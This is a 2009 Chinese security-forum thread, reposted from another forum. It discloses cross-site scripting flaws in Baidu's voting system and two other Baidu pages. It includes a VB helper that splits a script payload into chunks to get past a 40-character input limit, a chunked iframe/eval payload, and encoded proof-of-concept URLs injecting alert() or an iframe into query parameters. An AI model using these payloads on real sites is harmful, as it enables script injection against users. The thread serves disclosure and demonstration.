首页
课程
问答
CTF
社区
招聘
峰会
发现
排行榜
知识库
工具下载
看雪20年
看雪商城
证书查询
登录
注册
首页
社区
课程
招聘
发现
问答
CTF
排行榜
知识库
工具下载
峰会
看雪商城
证书查询
社区
付费问答
发新帖
1
0
[旧帖]
[推荐]百度投票系统---跨站漏洞!
0.00雪花
发表于: 2009-12-28 03:32
1783
[旧帖]
[推荐]百度投票系统---跨站漏洞!
0.00雪花
gblhack
2009-12-28 03:32
1783
(转自邪恶八进制 文章作者:woldy)
不知道转到这里合不合适,不合适就DEL了 呵呵
测试地址
http://apps.hi.baidu.com/vote/show/detail?vote_id=51268
===============================================
话说因为投票选项最多40个字,所以要给跨站代码转换一下,不过转换这些代码也挺费劲的,最好还是编个小程序来做~~~~~~
Private Sub Command1_Click()
a = Fix(Len(Text1.Text) / 16)
Text2.Text = "<script>z='" & Mid(Text1.Text, 1, 16) & "'</script>" & vbCrLf
For i = 2 To a
Text2.Text = Text2.Text & "<script>z=z+'" & Mid(Text1.Text, 1 + (16 * (i - 1)), 16) & "'</script>" & vbCrLf
Next
Text2.Text = Text2.Text & Chr(10) & Chr(13) & "<script>z=z+'" & Right(Text1.Text, Len(Text1.Text) Mod 16) & "'</script>" & vbCrLf
Text2.Text = Text2.Text & "<script>eval(z)</script>" & vbCrLf
Text2.Text = Text2.Text & "<script>alert('hello woldy!')</script>"
End Sub
2009-12-23 02:32
最后附上我的选项代码,祝大家圣诞快乐~~~~~~~
<script>z='document.write("'</script>
<script>z=z+'<iframe src=http'</script>
<script>z=z+'://www.163.com w'</script>
<script>z=z+'idth=666 height='</script>
<script>z=z+'666></iframe>")'</script>
<script>eval(z)</script>
<script>alert("hello woldy!")</script>
简易代码转换器下载地址:
http://forum.eviloctal.com/attachment.php?aid=13930
(续)
这次主要是通过
http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url=woldy
(百度全国大学生乡村信息化创新大赛)
和
http://ren.baidu.com/uquery/?type=1&fn=5&word=woldy
(百度空间——找朋友)进行的跨站行为。
测试地址:
http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%2D%2D%2D%2D%2D%2D%68%65%6C%6C%6F%20%77%6F%6C%64%79%21%2D%2D%2D%2D%2D%2D%2F%29%3C%2F%73%63%72%69%70%74%3E
http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D%20%3C%2F%69%66%72%61%6D%65%3E
http://ren.baidu.com/uquery/?type=1&fn=5&word=%27%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%2D%2D%2D%2D%2D%2D%68%65%6C%6C%6F%20%77%6F%6C%64%79%21%2D%2D%2D%2D%2D%2D%2F%29%3C%2F%73%63%72%69%70%74%3E
http://ren.baidu.com/uquery/?type=1&fn=5&word=%27%3C%2F%73%63%72%69%70%74%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D%20%3C%2F%69%66%72%61%6D%65%3E
================================================================
================================================================
测试地址1
http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%2D%2D%2D%2D%2D%2D%68%65%6C%6C%6F%20%77%6F%6C%64%79%21%2D%2D%2D%2D%2D%2D%2F%29%3C%2F%73%63%72%69%70%74%3E
原型
http://ren.baidu.com/uquery/?type=1&fn=5&word='
<;/script><iframe src=http://www.baidu.com </iframe>
测试地址2
http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D%20%3C%2F%69%66%72%61%6D%65%3E
原型
http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url=
"><iframe src=http://www.baidu.com </iframe>
测试地址3
http://ren.baidu.com/uquery/?type=1&fn=5&word=%27%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%2D%2D%2D%2D%2D%2D%68%65%6C%6C%6F%20%77%6F%6C%64%79%21%2D%2D%2D%2D%2D%2D%2F%29%3C%2F%73%63%72%69%70%74%3E
原型
http://ren.baidu.com/uquery/?type=1&fn=5&word='
</script><script>alert(/------hello woldy!------/)</script>
测试地址4
http://ren.baidu.com/uquery/?type=1&fn=5&word=%27%3C%2F%73%63%72%69%70%74%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D%20%3C%2F%69%66%72%61%6D%65%3E
原型
http://ren.baidu.com/uquery/?type=1&fn=5&word='
</script><iframe src=http://www.baidu.com </iframe>
12.24号的
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
收藏
・
1
免费
・
0
支持
分享
分享到微信
分享到QQ
分享到微博
赞赏记录
参与人
雪币
留言
时间
查看更多
赞赏
×
1 雪花
5 雪花
10 雪花
20 雪花
50 雪花
80 雪花
100 雪花
150 雪花
200 雪花
支付方式:
微信支付
赞赏留言:
快捷留言
感谢分享~
精品文章~
原创内容~
精彩转帖~
助人为乐~
感谢分享~
最新回复
(
8
)
frozenrain
雪 币:
107
活跃值:
(1683)
能力值:
( LV6,RANK:80 )
在线值:
发帖
26
回帖
509
粉丝
1
关注
私信
frozenrain
2
楼
CSDN也有
2009-12-28 08:49
0
chuaihjs
雪 币:
4
活跃值:
(10)
能力值:
( LV2,RANK:10 )
在线值:
发帖
0
回帖
70
粉丝
0
关注
私信
chuaihjs
3
楼
好东西呀强大
2009-12-28 09:29
0
鱼爱上猫
雪 币:
72
活跃值:
(52)
能力值:
( LV3,RANK:30 )
在线值:
发帖
7
回帖
111
粉丝
0
关注
私信
鱼爱上猫
4
楼
看不懂55555555555
2009-12-28 09:56
0
redrocky
雪 币:
5
活跃值:
(10)
能力值:
( LV2,RANK:10 )
在线值:
发帖
4
回帖
26
粉丝
0
关注
私信
redrocky
5
楼
恩 XSS的危害还是相当大的
2009-12-28 11:08
0
zhouligong
雪 币:
244
活跃值:
(10)
能力值:
( LV2,RANK:10 )
在线值:
发帖
3
回帖
12
粉丝
0
关注
私信
zhouligong
6
楼
有漏洞,很快就应该能补上了吧
2009-12-28 12:09
0
prinsess
雪 币:
0
活跃值:
(10)
能力值:
( LV2,RANK:10 )
在线值:
发帖
1
回帖
10
粉丝
0
关注
私信
prinsess
7
楼
太可怕了! = =
2009-12-28 16:40
0
frozenrain
雪 币:
107
活跃值:
(1683)
能力值:
( LV6,RANK:80 )
在线值:
发帖
26
回帖
509
粉丝
1
关注
私信
frozenrain
8
楼
可怕的来了:http://soucang.baidu.com/892358207/snap/41c189d01481b4061ad44cae.html
2009-12-29 10:13
0
youstar
雪 币:
267
活跃值:
(24)
能力值:
( LV8,RANK:130 )
在线值:
发帖
16
回帖
284
粉丝
0
关注
私信
youstar
2
9
楼
ls的快照嘛!
2009-12-29 10:34
0
游客
登录
|
注册
方可回帖
回帖
表情
雪币赚取及消费
高级回复
返回
gblhack
4
发帖
17
回帖
10
RANK
关注
私信
他的文章
[求普及]汇编语言的应用领域和该领域的掌握程度
4584
[求助]带暗桩的流氓软件如何判断
4896
[推荐]百度投票系统---跨站漏洞!
1784
关于我们
联系我们
企业服务
看雪公众号
专注于PC、移动、智能设备安全研究及逆向工程的开发者社区
看原图
赞赏
×
雪币:
+
留言:
快捷留言
为你点赞!
返回
顶部